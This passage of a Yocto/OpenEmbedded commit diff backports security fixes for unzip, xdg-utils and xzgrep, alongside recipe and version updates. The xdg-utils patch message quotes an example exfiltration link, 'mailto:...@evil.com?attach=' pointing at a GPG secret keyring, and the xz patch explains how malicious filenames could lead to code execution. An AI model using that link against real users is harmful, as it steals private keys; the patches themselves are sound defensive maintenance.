4LIC_FILES_CHKSUM = "file://COPYING;md5=d6bb62e73ca8b901d3f2e9d71542f4bb" 5LIC_FILES_CHKSUM = "file://COPYING;md5=d6bb62e73ca8b901d3f2e9d71542f4bb"
5DEPENDS = "" 6DEPENDS = ""
diff --git a/meta/recipes-extended/timezone/timezone.inc b/meta/recipes-extended/timezone/timezone.inc
index a89560b424..46bc1b794e 100644
--- a/meta/recipes-extended/timezone/timezone.inc
+++ b/meta/recipes-extended/timezone/timezone.inc
@@ -3,10 +3,10 @@ DESCRIPTION = "The Time Zone Database contains code and data that represent \
3the history of local time for many representative locations around the globe." 3the history of local time for many representative locations around the globe."
4HOMEPAGE = "http://www.iana.org/time-zones" 4HOMEPAGE = "http://www.iana.org/time-zones"
5SECTION = "base" 5SECTION = "base"
6LICENSE = "PD & BSD & BSD-3-Clause" 6LICENSE = "PD & BSD-3-Clause"
7LIC_FILES_CHKSUM = "file://LICENSE;md5=c679c9d6b02bc2757b3eaf8f53c43fba" 7LIC_FILES_CHKSUM = "file://LICENSE;md5=c679c9d6b02bc2757b3eaf8f53c43fba"
8 8
9PV = "2021a" 9PV = "2024a"
10 10
11SRC_URI =" http://www.iana.org/time-zones/repository/releases/tzcode${PV}.tar.gz;name=tzcode \ 11SRC_URI =" http://www.iana.org/time-zones/repository/releases/tzcode${PV}.tar.gz;name=tzcode \
12 http://www.iana.org/time-zones/repository/releases/tzdata${PV}.tar.gz;name=tzdata \ 12 http://www.iana.org/time-zones/repository/releases/tzdata${PV}.tar.gz;name=tzdata \
@@ -14,5 +14,5 @@ SRC_URI =" http://www.iana.org/time-zones/repository/releases/tzcode${PV}.tar.gz
14 14
15UPSTREAM_CHECK_URI = "http://www.iana.org/time-zones" 15UPSTREAM_CHECK_URI = "http://www.iana.org/time-zones"
16 16
17SRC_URI[tzcode.sha256sum] = "eb46bfa124b5b6bd13d61a609bfde8351bd192894708d33aa06e5c1e255802d0" 17SRC_URI[tzcode.sha256sum] = "80072894adff5a458f1d143e16e4ca1d8b2a122c9c5399da482cb68cba6a1ff8"
18SRC_URI[tzdata.sha256sum] = "39e7d2ba08c68cbaefc8de3227aab0dec2521be8042cf56855f7dc3a9fb14e08" 18SRC_URI[tzdata.sha256sum] = "0d0434459acbd2059a7a8da1f3304a84a86591f6ed69c6248fffa502b6edffe3"
diff --git a/meta/recipes-extended/timezone/tzdata.bb b/meta/recipes-extended/timezone/tzdata.bb
index e6a0655afe..cc6206ac70 100644
--- a/meta/recipes-extended/timezone/tzdata.bb
+++ b/meta/recipes-extended/timezone/tzdata.bb
@@ -19,13 +19,17 @@ TZONES= "africa antarctica asia australasia europe northamerica southamerica \
19 " 19 "
20# pacificnew 20# pacificnew
21 21
22# "slim" is the default since 2020b
23# "fat" is needed by e.g. MariaDB's mysql_tzinfo_to_sql
24ZIC_FMT ?= "slim"
25
22do_compile () { 26do_compile () {
23 for zone in ${TZONES}; do \ 27 for zone in ${TZONES}; do \
24 ${STAGING_BINDIR_NATIVE}/zic -d ${WORKDIR}${datadir}/zoneinfo -L /dev/null \ 28 ${STAGING_BINDIR_NATIVE}/zic -b ${ZIC_FMT} -d ${WORKDIR}${datadir}/zoneinfo -L /dev/null \
25 ${S}/${zone} ; \ 29 ${S}/${zone} ; \
26 ${STAGING_BINDIR_NATIVE}/zic -d ${WORKDIR}${datadir}/zoneinfo/posix -L /dev/null \ 30 ${STAGING_BINDIR_NATIVE}/zic -b ${ZIC_FMT} -d ${WORKDIR}${datadir}/zoneinfo/posix -L /dev/null \
27 ${S}/${zone} ; \ 31 ${S}/${zone} ; \
28 ${STAGING_BINDIR_NATIVE}/zic -d ${WORKDIR}${datadir}/zoneinfo/right -L ${S}/leapseconds \ 32 ${STAGING_BINDIR_NATIVE}/zic -b ${ZIC_FMT} -d ${WORKDIR}${datadir}/zoneinfo/right -L ${S}/leapseconds \
29 ${S}/${zone} ; \ 33 ${S}/${zone} ; \
30 done 34 done
31} 35}
diff --git a/meta/recipes-extended/unzip/unzip/CVE-2021-4217.patch b/meta/recipes-extended/unzip/unzip/CVE-2021-4217.patch
new file mode 100644
index 0000000000..6ba2b879a3
--- /dev/null
+++ b/meta/recipes-extended/unzip/unzip/CVE-2021-4217.patch
@@ -0,0 +1,67 @@
1From 731d698377dbd1f5b1b90efeb8094602ed59fc40 Mon Sep 17 00:00:00 2001
2From: Nils Bars <nils.bars@t-online.de>
3Date: Mon, 17 Jan 2022 16:53:16 +0000
4Subject: [PATCH] Fix null pointer dereference and use of uninitialized data
5
6This fixes a bug that causes use of uninitialized heap data if `readbuf` fails
7to read as many bytes as indicated by the extra field length attribute.
8Furthermore, this fixes a null pointer dereference if an archive contains an
9`EF_UNIPATH` extra field but does not have a filename set.
10---
11 fileio.c | 5 ++++-
12 process.c | 6 +++++-
13 2 files changed, 9 insertions(+), 2 deletions(-)
14---
15
16Patch from:
17https://bugs.launchpad.net/ubuntu/+source/unzip/+bug/1957077
18https://launchpadlibrarian.net/580782282/0001-Fix-null-pointer-dereference-and-use-of-uninitialized-data.patch
19Regenerated to apply without offsets.
20
21CVE: CVE-2021-4217
22
23Upstream-Status: Pending [infozip upstream inactive]
24
25Signed-off-by: Joe Slater <joe.slater@windriver.com>
26
27
28diff --git a/fileio.c b/fileio.c
29index 14460f3..1dc319e 100644
30--- a/fileio.c
31+++ b/fileio.c
32@@ -2301,8 +2301,11 @@ int do_string(__G__ length, option) /* return PK-type error code */
33 seek_zipf(__G__ G.cur_zipfile_bufstart - G.extra_bytes +
34 (G.inptr-G.inbuf) + length);
35 } else {
36- if (readbuf(__G__ (char *)G.extra_field, length) == 0)
37+ unsigned bytes_read = readbuf(__G__ (char *)G.extra_field, length);
38+ if (bytes_read == 0)
39 return PK_EOF;
40+ if (bytes_read != length)
41+ return PK_ERR;
42 /* Looks like here is where extra fields are read */
43 if (getZip64Data(__G__ G.extra_field, length) != PK_COOL)
44 {
45diff --git a/process.c b/process.c
46index 5f8f6c6..de843a5 100644
47--- a/process.c
48+++ b/process.c
49@@ -2058,10 +2058,14 @@ int getUnicodeData(__G__ ef_buf, ef_len)
50 G.unipath_checksum = makelong(offset + ef_buf);
51 offset += 4;
52
53+ if (!G.filename_full) {
54+ /* Check if we have a unicode extra section but no filename set */
55+ return PK_ERR;
56+ }
57+
58 /*
59 * Compute 32-bit crc
60 */
61-
62 chksum = crc32(chksum, (uch *)(G.filename_full),
63 strlen(G.filename_full));
64
65--
662.32.0
67
diff --git a/meta/recipes-extended/unzip/unzip/CVE-2022-0529.patch b/meta/recipes-extended/unzip/unzip/CVE-2022-0529.patch
new file mode 100644
index 0000000000..1c1e120deb
--- /dev/null
+++ b/meta/recipes-extended/unzip/unzip/CVE-2022-0529.patch
@@ -0,0 +1,39 @@
1https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1010355
2
3CVE: CVE-2022-0529
4Upstream-Status: Inactive-Upstream [need a new release]
5
6diff --git a/process.c b/process.c
7index d2a846e..99b9c7b 100644
8--- a/process.c
9+++ b/process.c
10@@ -2507,13 +2507,15 @@ char *wide_to_local_string(wide_string, escape_all)
11 char buf[9];
12 char *buffer = NULL;
13 char *local_string = NULL;
14+ size_t buffer_size;
15
16 for (wsize = 0; wide_string[wsize]; wsize++) ;
17
18 if (max_bytes < MAX_ESCAPE_BYTES)
19 max_bytes = MAX_ESCAPE_BYTES;
20
21- if ((buffer = (char *)malloc(wsize * max_bytes + 1)) == NULL) {
22+ buffer_size = wsize * max_bytes + 1;
23+ if ((buffer = (char *)malloc(buffer_size)) == NULL) {
24 return NULL;
25 }
26
27@@ -2552,7 +2554,11 @@ char *wide_to_local_string(wide_string, escape_all)
28 /* no MB for this wide */
29 /* use escape for wide character */
30 char *escape_string = wide_to_escape_string(wide_string[i]);
31- strcat(buffer, escape_string);
32+ size_t buffer_len = strlen(buffer);
33+ size_t escape_string_len = strlen(escape_string);
34+ if (buffer_len + escape_string_len + 1 > buffer_size)
35+ escape_string_len = buffer_size - buffer_len - 1;
36+ strncat(buffer, escape_string, escape_string_len);
37 free(escape_string);
38 }
39 }
diff --git a/meta/recipes-extended/unzip/unzip/CVE-2022-0530.patch b/meta/recipes-extended/unzip/unzip/CVE-2022-0530.patch
new file mode 100644
index 0000000000..363dafddc9
--- /dev/null
+++ b/meta/recipes-extended/unzip/unzip/CVE-2022-0530.patch
@@ -0,0 +1,33 @@
1https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1010355
2
3CVE: CVE-2022-0530
4Upstream-Status: Inactive-Upstream [need a new release]
5
6diff --git a/fileio.c b/fileio.c
7index 6290824..77e4b5f 100644
8--- a/fileio.c
9+++ b/fileio.c
10@@ -2361,6 +2361,9 @@ int do_string(__G__ length, option) /* return PK-type error code */
11 /* convert UTF-8 to local character set */
12 fn = utf8_to_local_string(G.unipath_filename,
13 G.unicode_escape_all);
14+ if (fn == NULL)
15+ return PK_ERR;
16+
17 /* make sure filename is short enough */
18 if (strlen(fn) >= FILNAMSIZ) {
19 fn[FILNAMSIZ - 1] = '\0';
20diff --git a/process.c b/process.c
21index d2a846e..715bc0f 100644
22--- a/process.c
23+++ b/process.c
24@@ -2605,6 +2605,8 @@ char *utf8_to_local_string(utf8_string, escape_all)
25 int escape_all;
26 {
27 zwchar *wide = utf8_to_wide_string(utf8_string);
28+ if (wide == NULL)
29+ return NULL;
30 char *loc = wide_to_local_string(wide, escape_all);
31 free(wide);
32 return loc;
33
diff --git a/meta/recipes-extended/unzip/unzip_6.0.bb b/meta/recipes-extended/unzip/unzip_6.0.bb
index c1ea0a9a2c..fa57c8f5bd 100644
--- a/meta/recipes-extended/unzip/unzip_6.0.bb
+++ b/meta/recipes-extended/unzip/unzip_6.0.bb
@@ -1,5 +1,6 @@
1SUMMARY = "Utilities for extracting and viewing files in .zip archives" 1SUMMARY = "Utilities for extracting and viewing files in .zip archives"
2HOMEPAGE = "http://www.info-zip.org" 2HOMEPAGE = "http://www.info-zip.org"
3DESCRIPTION = "Info-ZIP's purpose is to provide free, portable, high-quality versions of the Zip and UnZip compressor-archiver utilities that are compatible with the DOS-based PKZIP by PKWARE, Inc."
3SECTION = "console/utils" 4SECTION = "console/utils"
4LICENSE = "BSD-3-Clause" 5LICENSE = "BSD-3-Clause"
5LIC_FILES_CHKSUM = "file://LICENSE;md5=94caec5a51ef55ef711ee4e8b1c69e29" 6LIC_FILES_CHKSUM = "file://LICENSE;md5=94caec5a51ef55ef711ee4e8b1c69e29"
@@ -25,12 +26,18 @@ SRC_URI = "${SOURCEFORGE_MIRROR}/infozip/UnZip%206.x%20%28latest%29/UnZip%206.0/
25 file://CVE-2019-13232_p1.patch \ 26 file://CVE-2019-13232_p1.patch \
26 file://CVE-2019-13232_p2.patch \ 27 file://CVE-2019-13232_p2.patch \
27 file://CVE-2019-13232_p3.patch \ 28 file://CVE-2019-13232_p3.patch \
29 file://CVE-2021-4217.patch \
30 file://CVE-2022-0529.patch \
31 file://CVE-2022-0530.patch \
28" 32"
29UPSTREAM_VERSION_UNKNOWN = "1" 33UPSTREAM_VERSION_UNKNOWN = "1"
30 34
31SRC_URI[md5sum] = "62b490407489521db863b523a7f86375" 35SRC_URI[md5sum] = "62b490407489521db863b523a7f86375"
32SRC_URI[sha256sum] = "036d96991646d0449ed0aa952e4fbe21b476ce994abc276e49d30e686708bd37" 36SRC_URI[sha256sum] = "036d96991646d0449ed0aa952e4fbe21b476ce994abc276e49d30e686708bd37"
33 37
38# Patch from https://bugzilla.redhat.com/attachment.cgi?id=293893&action=diff applied to 6.0 source
39CVE_CHECK_WHITELIST += "CVE-2008-0888"
40
34# exclude version 5.5.2 which triggers a false positive 41# exclude version 5.5.2 which triggers a false positive
35UPSTREAM_CHECK_REGEX = "unzip(?P<pver>(?!552).+)\.tgz" 42UPSTREAM_CHECK_REGEX = "unzip(?P<pver>(?!552).+)\.tgz"
36 43
diff --git a/meta/recipes-extended/watchdog/watchdog_5.15.bb b/meta/recipes-extended/watchdog/watchdog_5.15.bb
index beebb5b004..0adf1fbb41 100644
--- a/meta/recipes-extended/watchdog/watchdog_5.15.bb
+++ b/meta/recipes-extended/watchdog/watchdog_5.15.bb
@@ -21,7 +21,6 @@ SRC_URI[sha256sum] = "ffdc865137ad5d8e53664bd22bad4de6ca136d1b4636720320cb52af0c
21# Can be dropped when the output next changes, avoids failures after 21# Can be dropped when the output next changes, avoids failures after
22# reproducibility issues 22# reproducibility issues
23PR = "r1" 23PR = "r1"
24HASHEQUIV_HASH_VERSION .= ".1"
25 24
26UPSTREAM_CHECK_URI = "http://sourceforge.net/projects/watchdog/files/watchdog/" 25UPSTREAM_CHECK_URI = "http://sourceforge.net/projects/watchdog/files/watchdog/"
27UPSTREAM_CHECK_REGEX = "/watchdog/(?P<pver>(\d+[\.\-_]*)+)/" 26UPSTREAM_CHECK_REGEX = "/watchdog/(?P<pver>(\d+[\.\-_]*)+)/"
diff --git a/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch b/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch
new file mode 100644
index 0000000000..948b9e22e9
--- /dev/null
+++ b/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch
@@ -0,0 +1,58 @@
1From 1f199813e0eb0246f63b54e9e154970e609575af Mon Sep 17 00:00:00 2001
2From: =?UTF-8?q?J=C3=B6rg=20Thalheim?= <joerg@thalheim.io>
3Date: Tue, 18 Aug 2020 16:52:24 +0100
4Subject: [PATCH] xdg-email: remove attachment handling from mailto
5MIME-Version: 1.0
6Content-Type: text/plain; charset=UTF-8
7Content-Transfer-Encoding: 8bit
8
9This allows attacker to extract secrets from users:
10
11mailto:sid@evil.com?attach=/.gnupg/secring.gpg
12
13See also https://bugzilla.mozilla.org/show_bug.cgi?id=1613425
14and https://gitlab.freedesktop.org/xdg/xdg-utils/-/issues/177
15
16Signed-off-by: Jörg Thalheim <joerg@thalheim.io>
17---
18 scripts/xdg-email.in | 7 +------
19 1 file changed, 1 insertion(+), 6 deletions(-)
20
21Upstream-Status: Backport
22CVE: CVE-2020-27748
23
24diff --git a/scripts/xdg-email.in b/scripts/xdg-email.in
25index 6db58ad..5d2f4f3 100644
26--- a/scripts/xdg-email.in
27+++ b/scripts/xdg-email.in
28@@ -32,7 +32,7 @@ _USAGE
29
30 run_thunderbird()
31 {
32- local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY ATTACH
33+ local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY
34 THUNDERBIRD="$1"
35 MAILTO=$(echo "$2" | sed 's/^mailto://')
36 echo "$MAILTO" | grep -qs "^?"
37@@ -48,7 +48,6 @@ run_thunderbird()
38 BCC=$(/bin/echo -e $(echo "$MAILTO" | grep '^bcc=' | sed 's/^bcc=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }'))
39 SUBJECT=$(echo "$MAILTO" | grep '^subject=' | tail -n 1)
40 BODY=$(echo "$MAILTO" | grep '^body=' | tail -n 1)
41- ATTACH=$(/bin/echo -e $(echo "$MAILTO" | grep '^attach=' | sed 's/^attach=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }' | sed 's/,$//'))
42
43 if [ -z "$TO" ] ; then
44 NEWMAILTO=
45@@ -68,10 +67,6 @@ run_thunderbird()
46 NEWMAILTO="${NEWMAILTO},$BODY"
47 fi
48
49- if [ -n "$ATTACH" ] ; then
50- NEWMAILTO="${NEWMAILTO},attachment='${ATTACH}'"
51- fi
52-
53 NEWMAILTO=$(echo "$NEWMAILTO" | sed 's/^,//')
54 DEBUG 1 "Running $THUNDERBIRD -compose \"$NEWMAILTO\""
55 "$THUNDERBIRD" -compose "$NEWMAILTO"
56--
57GitLab
58
diff --git a/meta/recipes-extended/xdg-utils/xdg-utils/CVE-2022-4055.patch b/meta/recipes-extended/xdg-utils/xdg-utils/CVE-2022-4055.patch
new file mode 100644
index 0000000000..383634ad53
--- /dev/null
+++ b/meta/recipes-extended/xdg-utils/xdg-utils/CVE-2022-4055.patch
@@ -0,0 +1,165 @@
1From f67c4d1f8bd2e3cbcb9eb49f5e897075e7426780 Mon Sep 17 00:00:00 2001
2From: Gabriel Corona <gabriel.corona@enst-bretagne.fr>
3Date: Thu, 25 Aug 2022 23:51:45 +0200
4Subject: [PATCH] Disable special support for Thunderbird in xdg-email (fixes
5 CVE-2020-27748, CVE-2022-4055)
6
7Upstream-Status: Backport [https://gitlab.freedesktop.org/xdg/xdg-utils/-/commit/f67c4d1f8bd2e3cbcb9eb49f5e897075e7426780]
8CVE: CVE-2022-4055
9Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
10---
11 scripts/xdg-email.in | 108 -------------------------------------------
12 1 file changed, 108 deletions(-)
13
14diff --git a/scripts/xdg-email.in b/scripts/xdg-email.in
15index 13ba2d5..b700679 100644
16--- a/scripts/xdg-email.in
17+++ b/scripts/xdg-email.in
18@@ -30,76 +30,8 @@ _USAGE
19
20 #@xdg-utils-common@
21
22-run_thunderbird()
23-{
24- local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY
25- THUNDERBIRD="$1"
26- MAILTO=$(echo "$2" | sed 's/^mailto://')
27- echo "$MAILTO" | grep -qs "^?"
28- if [ "$?" = "0" ] ; then
29- MAILTO=$(echo "$MAILTO" | sed 's/^?//')
30- else
31- MAILTO=$(echo "$MAILTO" | sed 's/^/to=/' | sed 's/?/\&/')
32- fi
33-
34- MAILTO=$(echo "$MAILTO" | sed 's/&/\n/g')
35- TO=$(/bin/echo -e $(echo "$MAILTO" | grep '^to=' | sed 's/^to=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }'))
36- CC=$(/bin/echo -e $(echo "$MAILTO" | grep '^cc=' | sed 's/^cc=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }'))
37- BCC=$(/bin/echo -e $(echo "$MAILTO" | grep '^bcc=' | sed 's/^bcc=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }'))
38- SUBJECT=$(echo "$MAILTO" | grep '^subject=' | tail -n 1)
39- BODY=$(echo "$MAILTO" | grep '^body=' | tail -n 1)
40-
41- if [ -z "$TO" ] ; then
42- NEWMAILTO=
43- else
44- NEWMAILTO="to='$TO'"
45- fi
46- if [ -n "$CC" ] ; then
47- NEWMAILTO="${NEWMAILTO},cc='$CC'"
48- fi
49- if [ -n "$BCC" ] ; then
50- NEWMAILTO="${NEWMAILTO},bcc='$BCC'"
51- fi
52- if [ -n "$SUBJECT" ] ; then
53- NEWMAILTO="${NEWMAILTO},$SUBJECT"
54- fi
55- if [ -n "$BODY" ] ; then
56- NEWMAILTO="${NEWMAILTO},$BODY"
57- fi
58-
59- NEWMAILTO=$(echo "$NEWMAILTO" | sed 's/^,//')
60- DEBUG 1 "Running $THUNDERBIRD -compose \"$NEWMAILTO\""
61- "$THUNDERBIRD" -compose "$NEWMAILTO"
62- if [ $? -eq 0 ]; then
63- exit_success
64- else
65- exit_failure_operation_failed
66- fi
67-}
68-
69 open_kde()
70 {
71- if [ -n "$KDE_SESSION_VERSION" ] && [ "$KDE_SESSION_VERSION" -ge 5 ]; then
72- local kreadconfig=kreadconfig$KDE_SESSION_VERSION
73- else
74- local kreadconfig=kreadconfig
75- fi
76-
77- if which $kreadconfig >/dev/null 2>&1; then
78- local profile=$($kreadconfig --file emaildefaults \
79- --group Defaults --key Profile)
80- if [ -n "$profile" ]; then
81- local client=$($kreadconfig --file emaildefaults \
82- --group "PROFILE_$profile" \
83- --key EmailClient \
84- | cut -d ' ' -f 1)
85-
86- if echo "$client" | grep -Eq 'thunderbird|icedove'; then
87- run_thunderbird "$client" "$1"
88- fi
89- fi
90- fi
91-
92 local command
93 case "$KDE_SESSION_VERSION" in
94 '') command=kmailservice ;;
95@@ -130,15 +62,6 @@ open_kde()
96
97 open_gnome3()
98 {
99- local client
100- local desktop
101- desktop=`xdg-mime query default "x-scheme-handler/mailto"`
102- client=`desktop_file_to_binary "$desktop"`
103- echo $client | grep -E 'thunderbird|icedove' > /dev/null 2>&1
104- if [ $? -eq 0 ] ; then
105- run_thunderbird "$client" "$1"
106- fi
107-
108 if gio help open 2>/dev/null 1>&2; then
109 DEBUG 1 "Running gio open \"$1\""
110 gio open "$1"
111@@ -159,13 +82,6 @@ open_gnome3()
112
113 open_gnome()
114 {
115- local client
116- client=`gconftool-2 --get /desktop/gnome/url-handlers/mailto/command | cut -d ' ' -f 1` || ""
117- echo $client | grep -E 'thunderbird|icedove' > /dev/null 2>&1
118- if [ $? -eq 0 ] ; then
119- run_thunderbird "$client" "$1"
120- fi
121-
122 if gio help open 2>/dev/null 1>&2; then
123 DEBUG 1 "Running gio open \"$1\""
124 gio open "$1"
125@@ -231,15 +147,6 @@ open_flatpak()
126
127 open_generic()
128 {
129- local client
130- local desktop
131- desktop=`xdg-mime query default "x-scheme-handler/mailto"`
132- client=`desktop_file_to_binary "$desktop"`
133- echo $client | grep -E 'thunderbird|icedove' > /dev/null 2>&1
134- if [ $? -eq 0 ] ; then
135- run_thunderbird "$client" "$1"
136- fi
137-
138 xdg-open "$1"
139 local ret=$?
140
141@@ -364,21 +271,6 @@ while [ $# -gt 0 ] ; do
142 shift
143 ;;
144
145- --attach)
146- if [ -z "$1" ] ; then
147- exit_failure_syntax "file argument missing for --attach option"
148- fi
149- check_input_file "$1"
150- file=`readlink -f "$1"` # Normalize path
151- if [ -z "$file" ] || [ ! -f "$file" ] ; then
152- exit_failure_file_missing "file '$1' does not exist"
153- fi
154-
155- url_encode "$file"
156- options="${options}attach=${result}&"
157- shift
158- ;;
159-
160 -*)
161 exit_failure_syntax "unexpected option '$parm'"
162 ;;
163--
1642.25.1
165
diff --git a/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb b/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb
index d371c5c28c..f6989430f5 100644
--- a/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb
+++ b/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb
@@ -20,6 +20,8 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=a5367a90934098d6b05af3b746405014"
20SRC_URI = "https://portland.freedesktop.org/download/${BPN}-${PV}.tar.gz \ 20SRC_URI = "https://portland.freedesktop.org/download/${BPN}-${PV}.tar.gz \
21 file://0001-Reinstate-xdg-terminal.patch \ 21 file://0001-Reinstate-xdg-terminal.patch \
22 file://0001-Don-t-build-the-in-script-manual.patch \ 22 file://0001-Don-t-build-the-in-script-manual.patch \
23 file://1f199813e0eb0246f63b54e9e154970e609575af.patch \
24 file://CVE-2022-4055.patch \
23 " 25 "
24 26
25SRC_URI[md5sum] = "902042508b626027a3709d105f0b63ff" 27SRC_URI[md5sum] = "902042508b626027a3709d105f0b63ff"
diff --git a/meta/recipes-extended/xinetd/xinetd_2.3.15.bb b/meta/recipes-extended/xinetd/xinetd_2.3.15.bb
index 6e43f5be6f..765a34e842 100644
--- a/meta/recipes-extended/xinetd/xinetd_2.3.15.bb
+++ b/meta/recipes-extended/xinetd/xinetd_2.3.15.bb
@@ -1,5 +1,6 @@
1SUMMARY = "Socket-based service activation daemon" 1SUMMARY = "Socket-based service activation daemon"
2HOMEPAGE = "https://github.com/xinetd-org/xinetd" 2HOMEPAGE = "https://github.com/xinetd-org/xinetd"
3DESCRIPTION = "xinetd is a powerful replacement for inetd, xinetd has access control mechanisms, extensive logging capabilities, the ability to make services available based on time, can place limits on the number of servers that can be started, and has deployable defence mechanisms to protect against port scanners, among other things."
3 4
4# xinetd is a BSD-like license 5# xinetd is a BSD-like license
5# Apple and Gentoo say BSD here. 6# Apple and Gentoo say BSD here.
@@ -12,7 +13,7 @@ PR = "r2"
12# Blacklist a bogus tag in upstream check 13# Blacklist a bogus tag in upstream check
13UPSTREAM_CHECK_GITTAGREGEX = "xinetd-(?P<pver>(?!20030122).+)" 14UPSTREAM_CHECK_GITTAGREGEX = "xinetd-(?P<pver>(?!20030122).+)"
14 15
15SRC_URI = "git://github.com/xinetd-org/xinetd.git;protocol=https \ 16SRC_URI = "git://github.com/xinetd-org/xinetd.git;protocol=https;branch=master \
16 file://xinetd.init \ 17 file://xinetd.init \
17 file://xinetd.conf \ 18 file://xinetd.conf \
18 file://xinetd.default \ 19 file://xinetd.default \
diff --git a/meta/recipes-extended/xz/xz/CVE-2022-1271.patch b/meta/recipes-extended/xz/xz/CVE-2022-1271.patch
new file mode 100644
index 0000000000..7841a534d3
--- /dev/null
+++ b/meta/recipes-extended/xz/xz/CVE-2022-1271.patch
@@ -0,0 +1,96 @@
1From 6bb2369742f9ff0451c245e8ca9b9dfac0cc88ba Mon Sep 17 00:00:00 2001
2From: Lasse Collin <lasse.collin@tukaani.org>
3Date: Tue, 29 Mar 2022 19:19:12 +0300
4Subject: [PATCH] xzgrep: Fix escaping of malicious filenames (ZDI-CAN-16587).
5
6Malicious filenames can make xzgrep to write to arbitrary files
7or (with a GNU sed extension) lead to arbitrary code execution.
8
9xzgrep from XZ Utils versions up to and including 5.2.5 are
10affected. 5.3.1alpha and 5.3.2alpha are affected as well.
11This patch works for all of them.
12
13This bug was inherited from gzip's zgrep. gzip 1.12 includes
14a fix for zgrep.
15
16The issue with the old sed script is that with multiple newlines,
17the N-command will read the second line of input, then the
18s-commands will be skipped because it's not the end of the
19file yet, then a new sed cycle starts and the pattern space
20is printed and emptied. So only the last line or two get escaped.
21
22One way to fix this would be to read all lines into the pattern
23space first. However, the included fix is even simpler: All lines
24except the last line get a backslash appended at the end. To ensure
25that shell command substitution doesn't eat a possible trailing
26newline, a colon is appended to the filename before escaping.
27The colon is later used to separate the filename from the grep
28output so it is fine to add it here instead of a few lines later.
29
30The old code also wasn't POSIX compliant as it used \n in the
31replacement section of the s-command. Using \<newline> is the
32POSIX compatible method.
33
34LC_ALL=C was added to the two critical sed commands. POSIX sed
35manual recommends it when using sed to manipulate pathnames
36because in other locales invalid multibyte sequences might
37cause issues with some sed implementations. In case of GNU sed,
38these particular sed scripts wouldn't have such problems but some
39other scripts could have, see:
40
41 info '(sed)Locale Considerations'
42
43This vulnerability was discovered by:
44cleemy desu wayo working with Trend Micro Zero Day Initiative
45
46Thanks to Jim Meyering and Paul Eggert discussing the different
47ways to fix this and for coordinating the patch release schedule
48with gzip.
49
50Upstream-Status: Backport [https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch]
51CVE: CVE-2022-1271
52
53Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org>
54---
55 src/scripts/xzgrep.in | 20 ++++++++++++--------
56 1 file changed, 12 insertions(+), 8 deletions(-)
57
58diff --git a/src/scripts/xzgrep.in b/src/scripts/xzgrep.in
59index a1fd19c..da1e65b 100644
60--- a/src/scripts/xzgrep.in
61+++ b/src/scripts/xzgrep.in
62@@ -178,22 +178,26 @@ for i; do
63 { test $# -eq 1 || test $no_filename -eq 1; }; then
64 eval "$grep"
65 else
66+ # Append a colon so that the last character will never be a newline
67+ # which would otherwise get lost in shell command substitution.
68+ i="$i:"
69+
70+ # Escape & \ | and newlines only if such characters are present
71+ # (speed optimization).
72 case $i in
73 (*'
74 '* | *'&'* | *'\'* | *'|'*)
75- i=$(printf '%s\n' "$i" |
76- sed '
77- $!N
78- $s/[&\|]/\\&/g
79- $s/\n/\\n/g
80- ');;
81+ i=$(printf '%s\n' "$i" | LC_ALL=C sed 's/[&\|]/\\&/g; $!s/$/\\/');;
82 esac
83- sed_script="s|^|$i:|"
84+
85+ # $i already ends with a colon so don't add it here.
86+ sed_script="s|^|$i|"
87
88 # Fail if grep or sed fails.
89 r=$(
90 exec 4>&1
91- (eval "$grep" 4>&-; echo $? >&4) 3>&- | sed "$sed_script" >&3 4>&-
92+ (eval "$grep" 4>&-; echo $? >&4) 3>&- |
93+ LC_ALL=C sed "$sed_script" >&3 4>&-
94 ) || r=2
95 exit $r
96 fi >&3 5>&-
diff --git a/meta/recipes-extended/xz/xz_5.2.4.bb b/meta/recipes-extended/xz/xz_5.2.4.bb
index 1c4450a9e9..6d80a4f2e9 100644
--- a/meta/recipes-extended/xz/xz_5.2.4.bb
+++ b/meta/recipes-extended/xz/xz_5.2.4.bb
@@ -1,5 +1,6 @@
1SUMMARY = "Utilities for managing LZMA compressed files" 1SUMMARY = "Utilities for managing LZMA compressed files"
2HOMEPAGE = "https://tukaani.org/xz/" 2HOMEPAGE = "https://tukaani.org/xz/"
3DESCRIPTION = "XZ Utils is free general-purpose data compression software with a high compression ratio. XZ Utils were written for POSIX-like systems, but also work on some not-so-POSIX systems. XZ Utils are the successor to LZMA Utils."
3SECTION = "base" 4SECTION = "base"
4 5
5# The source includes bits of PD, GPLv2, GPLv3, LGPLv2.1+, but the only file 6# The source includes bits of PD, GPLv2, GPLv3, LGPLv2.1+, but the only file
@@ -22,7 +23,9 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=97d554a32881fee0aa283d96e47cb24a \
22 file://lib/getopt.c;endline=23;md5=2069b0ee710572c03bb3114e4532cd84 \ 23 file://lib/getopt.c;endline=23;md5=2069b0ee710572c03bb3114e4532cd84 \
23 " 24 "
24 25
25SRC_URI = "https://tukaani.org/xz/xz-${PV}.tar.gz" 26SRC_URI = "https://tukaani.org/xz/xz-${PV}.tar.gz \
27 file://CVE-2022-1271.patch \
28 "
26SRC_URI[md5sum] = "5ace3264bdd00c65eeec2891346f65e6" 29SRC_URI[md5sum] = "5ace3264bdd00c65eeec2891346f65e6"
